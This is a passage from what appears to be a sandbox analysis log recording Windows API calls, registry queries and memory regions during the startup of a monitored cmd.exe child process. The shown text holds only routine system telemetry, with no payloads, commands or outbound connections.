lpBuffer=0xde390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0311.551] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xde390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0312.646] CoCreateGuid (in: pguid=0xde2cc | out: pguid=0xde2cc*(Data1=0xa487640d, Data2=0xc86c, Data3=0x4301, Data4=([0]=0xa7, [1]=0xc5, [2]=0xab, [3]=0xd7, [4]=0xd7, [5]=0xd7, [6]=0x77, [7]=0xe7))) returned 0x0 [0312.652] EtwEventRegister (in: ProviderId=0x62df124, EnableCallback=0xc527de, CallbackContext=0x0, RegHandle=0x62df100 | out: RegHandle=0x62df100) returned 0x0 [0312.652] EtwEventSetInformation (RegHandle=0x7c3748, InformationClass=0x24, EventInformation=0x2, InformationLength=0x62df0b4) returned 0x0 Thread: id = 82 os_tid = 0xd60 Thread: id = 83 os_tid = 0xd70 Thread: id = 84 os_tid = 0xcac [0304.940] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0304.941] RoInitialize () returned 0x1 [0304.941] RoUninitialize () returned 0x0 Thread: id = 85 os_tid = 0xca4 Process: id = "19" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x589b1000" os_pid = "0x6f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0xfb8" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2290 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2291 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2292 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2293 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2294 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2295 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2296 start_va = 0xba0000 end_va = 0xbf1fff monitored = 1 entry_point = 0xbb4fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2297 start_va = 0xc00000 end_va = 0x4bfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 2298 start_va = 0x77760000 end_va = 0x778dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2299 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2300 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2301 start_va = 0x7fff0000 end_va = 0x7df85d0cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2302 start_va = 0x7df85d0d0000 end_va = 0x7ff85d0cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df85d0d0000" filename = "" Region: id = 2303 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2304 start_va = 0x7ff85d291000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff85d291000" filename = "" Region: id = 2305 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2306 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2307 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2313 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 2314 start_va = 0x68240000 end_va = 0x6828ffff monitored = 0 entry_point = 0x68258180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2315 start_va = 0x682a0000 end_va = 0x68319fff monitored = 0 entry_point = 0x682b3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2316 start_va = 0x74c90000 end_va = 0x74d6ffff monitored = 0 entry_point = 0x74ca3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2317 start_va = 0x68290000 end_va = 0x68297fff monitored = 0 entry_point = 0x682917c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2318 start_va = 0x480000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2337 start_va = 0x74c90000 end_va = 0x74d6ffff monitored = 0 entry_point = 0x74ca3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2338 start_va = 0x75ac0000 end_va = 0x75c3dfff monitored = 0 entry_point = 0x75b71b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2339 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2340 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2341 start_va = 0x480000 end_va = 0x53dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2342 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2438 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2439 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2476 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2477 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 2478 start_va = 0x74570000 end_va = 0x7462dfff monitored = 0 entry_point = 0x745a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2479 start_va = 0x540000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2480 start_va = 0x810000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 2481 start_va = 0x910000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 2482 start_va = 0x1d0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3098 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3119 start_va = 0x6d5c0000 end_va = 0x6d5cafff monitored = 0 entry_point = 0x6d5c2940 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 3123 start_va = 0x756d0000 end_va = 0x75816fff monitored = 0 entry_point = 0x756e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3124 start_va = 0x749b0000 end_va = 0x74afefff monitored = 0 entry_point = 0x74a66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3125 start_va = 0x440000 end_va = 0x469fff monitored = 0 entry_point = 0x445680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3126 start_va = 0x9d0000 end_va = 0xb57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 3127 start_va = 0x75c40000 end_va = 0x75c6afff monitored = 0 entry_point = 0x75c45680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3128 start_va = 0x4c00000 end_va = 0x4d80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c00000" filename = "" Region: id = 3129 start_va = 0x4d90000 end_va = 0x4e85fff monitored = 0 entry_point = 0x4d91840 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 3136 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3137 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3138 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 3139 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3140 start_va = 0x4e90000 end_va = 0x628ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e90000" filename = "" Region: id = 3141 start_va = 0x6290000 end_va = 0x668afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006290000" filename = "" Region: id = 3142 start_va = 0x580000 end_va = 0x5b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3143 start_va = 0x4d90000 end_va = 0x4e85fff monitored = 0 entry_point = 0x4d91840 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 3144 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "basebrd.dll.mui" filename = "\\Windows\\Branding\\Basebrd\\en-US\\basebrd.dll.mui" (normalized: "c:\\windows\\branding\\basebrd\\en-us\\basebrd.dll.mui") Region: id = 3145 start_va = 0x6690000 end_va = 0x69c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 72 os_tid = 0x9a8 [0301.439] GetModuleHandleA (lpModuleName=0x0) returned 0xba0000 [0301.439] __set_app_type (_Type=0x1) [0301.439] __p__fmode () returned 0x74624d6c [0301.439] __p__commode () returned 0x74625b1c [0301.439] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xbb5200) returned 0x0 [0301.440] __getmainargs (in: _Argc=0xbc60e8, _Argv=0xbc60ec, _Env=0xbc60f0, _DoWildCard=0, _StartInfo=0xbc60fc | out: _Argc=0xbc60e8, _Argv=0xbc60ec, _Env=0xbc60f0) returned 0 [0301.440] GetCurrentThreadId () returned 0x9a8 [0301.440] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9a8) returned 0x84 [0301.440] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74c90000 [0301.440] GetProcAddress (hModule=0x74c90000, lpProcName="SetThreadUILanguage") returned 0x74cd2510 [0301.440] SetThreadUILanguage (LangId=0x0) returned 0x409 [0301.653] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0301.653] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0301.653] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0301.653] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0301.653] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0301.653] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0301.653] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0301.653] GetConsoleOutputCP () returned 0x1b5 [0301.832] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xbcf460 | out: lpCPInfo=0xbcf460) returned 1 [0301.832] SetConsoleCtrlHandler (HandlerRoutine=0xbc0e40, Add=1) returned 1 [0301.833] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.834] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0301.988] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.988] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbcf40c | out: lpMode=0xbcf40c) returned 1 [0302.113] _get_osfhandle (_FileHandle=1) returned 0x3c [0302.113] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0302.283] _get_osfhandle (_FileHandle=0) returned 0x38 [0302.283] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xbcf408 | out: lpMode=0xbcf408) returned 1 [0302.490] _get_osfhandle (_FileHandle=0) returned 0x38 [0302.490] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0302.986] GetEnvironmentStringsW () returned 0x617c98* [0302.986] GetProcessHeap () returned 0x610000 [0302.986] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa1a) returned 0x6186c0 [0302.987] memcpy (in: _Dst=0x6186c0, _Src=0x617c98, _Size=0xa1a | out: _Dst=0x6186c0) returned 0x6186c0 [0302.987] FreeEnvironmentStringsA (penv="A") returned 1 [0302.987] GetProcessHeap () returned 0x610000 [0302.987] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4) returned 0x610550 [0302.987] GetEnvironmentStringsW () returned 0x617c98* [0302.987] GetProcessHeap () returned 0x610000 [0302.987] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa1a) returned 0x6190e8 [0302.987] memcpy (in: _Dst=0x6190e8, _Src=0x617c98, _Size=0xa1a | out: _Dst=0x6190e8) returned 0x6190e8 [0302.987] FreeEnvironmentStringsA (penv="A") returned 1 [0302.987] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0302.987] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0302.987] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0302.987] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0302.987] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0302.987] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0302.987] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0302.987] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0302.987] RegCloseKey (hKey=0x94) returned 0x0 [0302.988] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0302.988] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0302.988] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0302.988] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0302.988] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0302.988] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0302.988] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0302.988] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0302.988] RegCloseKey (hKey=0x94) returned 0x0 [0302.988] time (in: timer=0x0 | out: timer=0x0) returned 0x628a1dfd [0302.988] srand (_Seed=0x628a1dfd) [0302.988] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\"" [0302.988] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\"" [0302.988] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xbd7720 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0302.988] GetProcessHeap () returned 0x610000 [0302.988] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x210) returned 0x619b10 [0302.989] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x619b18, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0302.989] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xbcf4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0302.989] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xbcf4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0302.989] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xbcf4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0302.989] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0302.989] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0302.989] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0302.989] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0302.989] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0302.989] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0302.989] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0302.989] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0302.989] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0302.989] GetProcessHeap () returned 0x610000 [0302.990] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x6186c0) returned 1 [0302.990] GetEnvironmentStringsW () returned 0x617c98* [0302.990] GetProcessHeap () returned 0x610000 [0302.990] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa32) returned 0x61a768 [0302.990] memcpy (in: _Dst=0x61a768, _Src=0x617c98, _Size=0xa32 | out: _Dst=0x61a768) returned 0x61a768 [0302.990] FreeEnvironmentStringsA (penv="A") returned 1 [0302.990] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xbcf4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0302.990] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xbcf4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0302.990] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0302.990] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0302.990] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0302.991] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0302.991] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0302.991] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0302.991] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0302.991] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0302.991] GetProcessHeap () returned 0x610000 [0302.991] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x6105c8 [0302.991] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0302.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x19fc4c*="system32") returned 0x13 [0302.991] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0302.991] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf2a814c5, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xf2a814c5, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x610600 [0302.991] FindClose (in: hFindFile=0x610600 | out: hFindFile=0x610600) returned 1 [0302.991] memcpy (in: _Dst=0x19fc5a, _Src=0x19f9fc, _Size=0xe | out: _Dst=0x19fc5a) returned 0x19fc5a [0302.991] FindFirstFileW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc99a46a3, ftLastAccessTime.dwHighDateTime=0x1d8596d, ftLastWriteTime.dwLowDateTime=0xc99a46a3, ftLastWriteTime.dwHighDateTime=0x1d8596d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x610600 [0302.992] FindClose (in: hFindFile=0x610600 | out: hFindFile=0x610600) returned 1 [0302.992] memcpy (in: _Dst=0x19fc6a, _Src=0x19f9fc, _Size=0x10 | out: _Dst=0x19fc6a) returned 0x19fc6a [0302.992] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0302.992] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0302.992] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0302.992] GetProcessHeap () returned 0x610000 [0302.992] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x61a768) returned 1 [0302.992] GetEnvironmentStringsW () returned 0x617c98* [0302.992] GetProcessHeap () returned 0x610000 [0302.992] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa62) returned 0x619d28 [0302.992] memcpy (in: _Dst=0x619d28, _Src=0x617c98, _Size=0xa62 | out: _Dst=0x619d28) returned 0x619d28 [0302.992] FreeEnvironmentStringsA (penv="=") returned 1 [0302.992] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xbd7720 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0302.993] GetProcessHeap () returned 0x610000 [0302.993] RtlFreeHeap 